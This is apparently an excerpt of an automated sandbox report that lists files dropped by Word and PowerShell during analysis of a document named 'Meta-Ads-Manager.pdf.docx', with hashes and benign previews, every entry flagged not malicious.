C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fc2smexb.wzt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ff2jklqz.sel.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0ohmbt0.dk2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0dlc5vr.lr5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbuz2buj.ruf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njqx0gol.gvv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqu1l1ic.bby.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouwkm50d.x2j.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3ykaoxo.l4c.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qys2xr01.2aj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\~$-Meta-Ads-Manager.pdf.docx

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.6673400768391944
Encrypted:	false
SSDEEP:	3:6NmltlylDQNSVBFtlflmltlWa3FosXAauTl/zl:mSmMQEma3FosQamJ
MD5:	32F6BD6BB453B7E217A31B957DBA26FC
SHA1:	155723A767EB118369A7087E6880E10702A74F60
SHA-256:	BA6FA5817A6AC8B82CED6C018A982CABB1D60989EFFD9346C7BC8B58E9B30163
SHA-512:	4052BA4CD608C44F299163BD5298836B09FCD4ECFD0A18D2285CBA06281EF85E43F99DB45E2D8368238073C41DDEBD1400AFAA9CD0C0C37B015F2429DB72FB73
Malicious:	false
Preview:	.user.................................................A.r.t.h.u.r...........(...{............................................Ps.K...........]r.K...........G..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.6937429461684133
Encrypted:	false
SSDEEP:	3:6NmltlylDQNTW4OnlNAH3duQtlll/zl:mSmMg4OjI3w6lXJ
MD5:	A54FA8A632CD87A7D77D1CBA06437FA2
SHA1:	3920B44FD1959BFC2E9E01343A6D01833E151B1D
SHA-256:	AA8105F1816CDD8920694AC63EE1DAD7CA1F659C1F48D47897DE89D285AC3169
SHA-512:	649478CA2639FE4AAED2A9CF20A719DBE9945C90D2708C7CF5776448D689C43C7407DA582879F9F068664411092FDF05ADF2E773571D7D7934A3BAFB7419AD89
Malicious:	false
Preview:	.user.................................................A.r.t.h.u.r.............{...........GK......................GK...............!.......$X.K...........G..

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	18
Entropy (8bit):	2.725480556997868
Encrypted:	false
SSDEEP:	3:Qkh1QNIl:Qk8W
MD5:	D1F4EBCAA7623D3DBFBF051D65AB1130
SHA1:	A51DDF1371C35784AA2AF44C5EE706285B378CF7
SHA-256:	A838F07E91D01FCF6874D4F5495F69B9E6AB483D367E0E188A809700DC0D0AAE
SHA-512:	EC32CB4736C75066947B9478B644F550D8B48510D98B4E2D065DFF2219F94D76E83AC886D9FEE795580C17C33388A8B7AA858F71754C97A34CAF976B21B17448
Malicious:	false
Preview:	..A.r.t.h.u.r.....

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0809.lex

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7595382560070605
Encrypted:	false
SSDEEP:	96:1CkvZCHGwhkvhkvCCtphQVSSHqhQVSSHH:1CQO3QMRQMI
MD5:	E607F95C37F587E85EE178F85665D472
SHA1:	F19ACD4C2A18E80A6C74D862E3DD7410A9217C27
SHA-256:	A7A2C5CD9E644C764E9DD40E594F43A2B167F0617B8BDD0C10CFDD606F924C22
SHA-512:	D1F27C3225C106A7889049AA519084A70809FAA92E5FC2E048DBE5AE648101731CC04A7B45361CEA6DC714EF1ED73632D8DE51867804BF84972CF0F80B19AC35
Malicious:	false
Preview:	...................................FL..................F.".. ...;.}.S.......K..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...B/..K......K......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.[....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.[..Roaming.@......"S.Y.[....D.....................!...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.[....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.+..Windows.@......"S.Y.+....F.....................\|R:.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.YR+....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.YR+....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y.*....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y.[....i...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9LV816WCU4X2UTAPOQ1C.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7595382560070605
Encrypted:	false
SSDEEP:	96:1CkvZCHGwhkvhkvCCtphQVSSHqhQVSSHH:1CQO3QMRQMI
MD5:	E607F95C37F587E85EE178F85665D472
SHA1:	F19ACD4C2A18E80A6C74D862E3DD7410A9217C27
SHA-256:	A7A2C5CD9E644C764E9DD40E594F43A2B167F0617B8BDD0C10CFDD606F924C22
SHA-512:	D1F27C3225C106A7889049AA519084A70809FAA92E5FC2E048DBE5AE648101731CC04A7B45361CEA6DC714EF1ED73632D8DE51867804BF84972CF0F80B19AC35
Malicious:	false
Preview:	...................................FL..................F.".. ...;.}.S.......K..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...B/..K......K......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.[....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.[..Roaming.@......"S.Y.[....D.....................!...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.[....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.+..Windows.@......"S.Y.+....F.....................\|R:.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.YR+....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.YR+....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y.*....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y.[....i...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NRRJMOYN8LNWH9CIEVW4.temp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	modified
Size (bytes):	12
Entropy (8bit):	0.41381685030363374
Encrypted:	false
SSDEEP:	3:/l:
MD5:	E4A1661C2C886EBB688DEC494532431C
SHA1:	A2AE2A7DB83B33DC95396607258F553114C9183C
SHA-256:	B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
SHA-512:	EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
Malicious:	false
Preview:	............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	12
Entropy (8bit):	0.41381685030363374
Encrypted:	false
SSDEEP:	3:/l:
MD5:	E4A1661C2C886EBB688DEC494532431C
SHA1:	A2AE2A7DB83B33DC95396607258F553114C9183C
SHA-256:	B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
SHA-512:	EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
Malicious:	false
Preview:	............

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\System32\spp\store\2.0\cache\cache.dat

Download File

Process:	C:\Windows\System32\sppsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	796616
Entropy (8bit):	3.878012200104914
Encrypted:	false
SSDEEP:	6144:KEcXiBNLsfNeeD61SRawazmRnLekXEij/OnWRo1Yr+5i6ByhMTUA28yIGpZc:KEcXiBqfNeeD6qawazmRnLekXSSov3
MD5:	BB8D8642FBD78C17E491B5C591DC7059
SHA1:	A76985CCFB9FB2FA5A635470F81F9522737B4006
SHA-256:	766143A782AFA380828B9AA30E0F00E0BC32508B14E368C0F2C220B6F32D54D1
SHA-512:	A207E7DA997B4B0CA668AED32ED2913EC387D54B447E6E1F3F9E29FFCBC0BAEF6C8B90363332D5526AEC8B332E5E4824B3C27DAD46550C5413DC869A04ADA1A4
Malicious:	false
Preview:	..E(....................;._....................................$.$.G.l.o.b.a.l.$.$......my......................\.....Z...0...+.0.J.f.p.q.U.8.x.J.e.Y.n.Z.J.W.G.k.L.b.7.o./.C.D.+.A.J.9.U.P.y.A.e.m.R.4.2.m.F.n.1.s.=...........E(......................j.............................Z.......+.2.e.7.W.B.7.f.+.F.7.k.k.4.M.y.C.N.s.p.j.x.r.8.T.7.W.H.q.u.k.M.w.4.H.5.C.o.m.q.c.L.Q.=..........R2H....................Uz(.....................(5X.........D...O.f.f.i.c.e. .1.9.,. .T.I.M.E.B.A.S.E.D._.E.V.A.L. .c.h.a.n.n.e.l...............Z...0...+.4.R.6.u.F.1.m.q./.B.3.W.x.J.e./.F.6.Z.l.g.e.6.z.r.T.5.4.N.8.w.2.l.8.S.Q.Q.3.y.p.L.Q.=...........E(......................j.....................8..=....Z.......+.5.9.4.3.l.j.l.G.R.C.2.b.R.G.h.s.Y.q.K.N.O.g.0.3.U.y.s.i.K.c.w.b.c.a.T.k.W.2.V.f.N.4.=..........R2H....................Uz(......................PPu............!.......J...J...e.d.e.a.3.f.0.d.-.b.a.5.4.-.4.2.a.d.-.a.7.7.f.-.3.d.8.7.e.5.0.0.a.0.0.3.........e.d.e.a.3.f.0.d.-.b.a.5.4.-.4.2.a.d.-.a.7.7.f.-.

C:\Windows\Temp\__PSScriptPolicyTest_35seencx.cf4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_4p3do2ya.51f.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_fbgvufv1.435.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_ghxm1cm5.hk4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_grhdx2af.11d.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_l5tzifgy.pfi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_o434m3lb.b5c.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_tm5rp2oy.dzl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_wh5h301r.unf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_y1m3zayd.r0m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\deviceId.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	37
Entropy (8bit):	4.229327351940021
Encrypted:	false
SSDEEP:	3:4yHbkT/dkcovn:dbkRsn
MD5:	17D74848A2AABEDAF9A3BF09D7CF3A2B
SHA1:	056C4F9329C07DD7A3414257E1D77D41D4C402C5
SHA-256:	AEF31441A868B517503CE23E6D663969A50CAC256CA3311CCD17EE1AE11D5C26
SHA-512:	8A0C39EACAEA374E904A931F97D8C32C1BABCB47763195979D93AEA366624B304F6B0B25CB8CBFDE5B56AA129CFC9B51B3BAA697149295A103A53D9E5139E580
Malicious:	false
Preview:	.63013372F6575A9D4EA29CB608798ED9..

